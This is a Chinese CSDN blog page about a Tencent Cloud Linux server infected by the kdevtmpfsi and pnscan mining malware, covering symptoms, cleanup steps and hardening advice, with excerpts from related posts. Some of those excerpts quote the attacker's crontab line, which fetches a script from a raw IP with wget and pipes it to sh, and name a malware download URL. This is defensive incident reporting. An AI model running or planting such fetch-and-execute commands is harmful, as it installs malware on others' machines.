Linux被kdevtmpfsi,pnscan挖矿病毒入侵记录

最新推荐文章于 2025-02-27 09:45:55 发布
最新推荐文章于 2025-02-27 09:45:55 发布
阅读量1k 收藏 3
点赞数 3
分类专栏: 日常学习 文章标签: linux docker 运维 centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26365851/article/details/119759560
版权
本文记录了一次Linux服务器被kdevtmpfsi和pnscan挖矿病毒攻击的经历。病毒导致CPU高占用、网络中断及redis端口被占用。通过排查和清理,包括杀死进程、删除相关文件和禁用计划任务,成功清除病毒。总结中强调了加强服务器安全的重要性,如设置服务密码、限制端口访问和避免基础服务暴露在外网。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Linux被kdevtmpfsi,pnscan挖矿病毒入侵

记录起因

从腾讯云刚拿了一台新服务器,第一天装好docker环境后,第二天上午就收到了来自腾讯云的短信警告。登陆平台后发现站内信
在这里插入图片描述

好在腾讯没有直接停用我的服务器,直接进入服务使用top观察了一会高占用进程
发现kdevtmpfsi 和 pnscan 已经把我的cpu跑满了。

pnscan病毒感染惨状

  • 使用top & ps & netstat 等等命令,都无法正常使用
  • CPU基本100%,时不时网络中断
  • redis端口6379被大规则线程占用
  • 通过lsof -i:6379 查看进程,发现进程id一直在变动
  • rm -rf 攻击的脚本,显示没权限(加sudo也没用,彻底对这个病毒服气了!)

kdevtmpfsi病毒感染惨状

  • 依赖于我的docker容器,并自动为我下载镜像,启动伪装服务
  • cpu占用高
排查方法(kdevtmpfsi)

查看 kdevtmpfsi 进程,使用 ps -ef | grep kdevtmpfsi 命令查看&#

最低0.47元/天 解锁文章
公网中Linux系统下Redis使用注意事项以及被pnscan病毒攻击的经过
weixin_54626591的博客
08-24 706
公网中Linux系统下Redis使用注意事项以及被pnscan病毒攻击的经过
阿里云linux服务器的一次糟糕体验-pnscan病毒
qq_37372909的博客
06-20 512
阿里云新买的linux,被安装兄弟安装后,不到一周中了pnscan挖坑病毒
挖矿病毒 kdevtmpfsi 处理--实操
最新发布
读万卷书,行万里路
02-27 105
但没有过1分钟进程又运行了,这时就能想到,kdevtmpfsi 有守护程序或者有计划任务。第三步:kill 掉 kdevtmpfsi 守护进程 kill -9 30903 30904,再 killall -9 kdevtmpfsi 挖矿病毒,最后删除 kdevtmpfsi 执行程序 rm -f /tmp/kdevtmpfsi。首先:查看 kdevtmpfsi 进程,使用 ps -ef | grep kdevtmpfsi ps -ef | grep kinsing命令查看,见下图。至此杀毒工作基本进入尾声。
CentOSkdevtmpfsi病毒
jinglinggg的专栏
12-06 1425
CentOSkdevtmpfsi病毒,几日的查杀,最终失败!
阿里云Centos 解决挖矿程序:kdevtmpfsi--服务器CPU占用高、内存占用高
暮歌半生情朽的博客
09-17 906
前言 互联网存在很多的漏洞,如果我们使用不当,就会别被别人利用或者是盗取信息。之前在阿里云买的服务器,自己配置了nginx,mysql,redis等服务。由于在某些时候,本地程序开发中需要使用这些服务,便开放了相关的接口包括redis 的6379端口。通过查阅资料,病毒经常利用redis的6379端口被注入。 中毒具体描述 某一天,我写完本地程序,准备部署到云服务器,然而我的xshell始终是连接不上服务器,或者是连接上反应非常慢,我怀疑阿里云对我的服务器动了什么了(实在是对不住,毕竟我也不知道还有这种事情
linux的redis病毒pscan,Docker的redis容器导致被挖矿病毒*kdevtmpfsi * 入侵, 干它
weixin_29218509的博客
05-14 596
以下内容全凭记忆。研发的一台docker创建了redis容器,直接设置无密访问导致被入侵。在母机上查询一下,其实第一个就可以了,第二个很多人搜索不到。[root@devtest tmp]# find / -name "*kdevtmpfsi*"/var/lib/docker/overlay2/0cf543cd0ddd70e9e68333057aefa1ca0c1864e5214630b4dd2f4...
Linuxkdevtmpfsi 挖矿病毒入侵
phubing
04-03 762
Linuxkdevtmpfsi挖矿病毒入侵 一. 错误信息 先上阿里云上的报警信息。有个最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%,第一次删除干净了kdevtmpfsi程序,没曾想几分钟以后,就出现了第二个警告。使用netstat -antp命令查看端口使用情况,又出现了kdevtmpfsi如图三所示 netsta...
Centos7/8 kdevtmpfsi病毒处理
weixin_42366275的博客
12-17 736
问题描述: top命令查看,资源被kdevtmpfs占满,导致云服务器大量服务被关 原因分析: 一般都是redis不安全被入侵,建议设置密码,不允许外网访问,因为redis一般是后端使用,后端使用如jar包,jar包访问完全在redis本机访问,访问地址让后端写127.0.0.1即可,或者配置文件在bind选项里面指定访问ip,具体配置看我之前redis教程修改配置文件项即可 解决方案: crontab -r # 清除定时任务 ps -aux |grep kdevtmpfsi |grep -v gr
Linux系统感染"kdevtmpfsi"病毒如何处理
AlawaysOnline的专栏
03-24 1723
最近我的阿里云服务器异常的卡,登陆阿里云服务top命令发现有个kdevtmpfsi进程吃了99%的cpu。 然后百度了下kdevtmpfsi,了解到: kdevtmpfsi是一种挖矿病毒,而且有守护进程,单独kill掉 kdevtmpfsi 进程会不断恢复占用。守护进程名称为 kinsing,需要kill后才能解决问题。 1.杀掉进程并删除文件(杀掉之后还会重新启动) ps -au...
kdevtmpfsi 病毒感染及处理办法
weixin_39334709的博客
10-17 1712
发现病毒 今天在家里,写完爬虫部署到远程服务器上后,正想运行时,发现 ScrapydWeb 上多了一条奇怪的记录: 好家伙,项目名称居然就是 evil ,生怕我不知道这个是一只“邪恶”的爬虫吗? 仔细看这只邪恶的爬虫,发现有一条比较关键的信息,就是下面的 * * * * * wget -q -O - http://195.3.146.118/sc.sh | sh > /dev/null 2>&1 ,很明显,这是一条 crontab 语句。 在服务器的命令行里输入 crontab -l
Linux CPU占用率99%很高被kdevtmpfsi 和kinsing 挖矿病毒入侵
小蜜蜂
02-23 3759
目录 一:警告 二:查看cup占用 三:解决问题 1.首先停掉kdevtmpfsi的程序 2.删除Linux下的异常定时任务 3.结束kdevtmpfsi进程及端口占用 4:删除掉kdevtmpfsi的相关文件 四.怎么预防处理这个病毒 一:警告 先上阿里云上的报警信息。有个最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为...
病毒处理 kdevtmpfsi & kinsing
qw311113qin的博客
05-22 759
服务器遭到入侵,单删病毒进程解决不了,要找到它的根。 病毒进程删了还会继续被拉起,估计就是被植入了实时任务,先查看服务器计划任务的日志/var/log/cron 发现了病毒脚本:http://91.241.19.134/unk.sh 希望有能力的大佬处理下,为民除害。 ​从日志看到,病毒是普通用户执行的,到对应普通用户的定时任务下查看,在/var/spool/cron下的letsun用户定时任务中是发现有该病毒下载执行脚本的,清理掉。 也有的病毒是root运行的,总之基本上都是在定时任务中,都要
kdevtmpfsi 处理(挖矿病毒清除)
Ancoda的博客
04-26 8682
kdevtmpfsi 是一个挖矿病毒,大多数都是 redis 程序侵入,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意module,之后在目标机器上加载此恶意module并执行恶意指令。普遍比较明显的就是 占用高额的CPU、内存资源,而且受害者还不少。
挖矿病毒清除)kdevtmpfsi 处理
可乐要加冰!!!
03-19 1708
挖矿病毒清除)kdevtmpfsi 处理
linux系统出现kdevtmpfsi或者trace占用cpu100%的问题(有人用你的服务器进行挖矿
liangshao666的博客
12-26 4729
1.linux系统出现cpu100%的问题 1.车祸现场还原 2.输入如下命令 然后 netstat -antpl |grep 5912 *3.复制ip地址178.170.189.5 * 如图操作 4.发现被黑客攻击 * 如果使用kill -9 pid 不好使的话,就是殺不死的話进行如下 5.使用如下操作 6.发现crontab -e 无可疑定时文件即可、或者将可疑的定时文件删除,本...
记一次服务器云服务器“kdevtmpfsi病毒的解决
Dark_AK44的博客
06-08 1733
云服务器 被植入 kdevtmpfsi 病毒,治标治本
linux服务器 kdevtmpfsi solrd 病毒处理 记住一定要多删除几次。重启
Super_man54188的博客
02-20 1291
所有中病毒 无非是cpu内存占用高 一定要断公网地址 修改root密码 删除history历史记录 history -c 映射端口也要注意 solrd病毒 公司服务器负载突然上来了,用top命令查看,发现了一个很诡异的进程 然后grep这个进程的进程号,发现是运行在/tmp/.solr/solrd下;于是赶紧杀进程,删程序,负载就下来了;但是还没有完,用top命令再次查看的时候惊...
处理kdevtmpfsi 挖矿病毒入侵
何以问_的博客
04-25 299
kdevtmpfsi 挖矿病毒入侵 查看端口并杀掉任务 kdevtmpfsi有守护进程,单独kill掉kdevtmpfsi进程会不断恢复占用。守护进程名称为kinsing,需要kill后才能解决 ps -aux |grep kinsing ps -aux |grep kdevtmpfsi [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pRCdR8b2-1619339244799)(https://i.loli.net/2020/06/01/EBZ8oiSumFjUz2
Linux历史命令时间记录设置与查看方法
Linux系统中,`history`命令是用于查看和管理用户在终端中的历史命令记录的重要工具。默认情况下,虽然`history`命令会记录用户的操作,但它并不直接显示时间戳。然而,通过配置环境变量和bash配置文件,我们可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值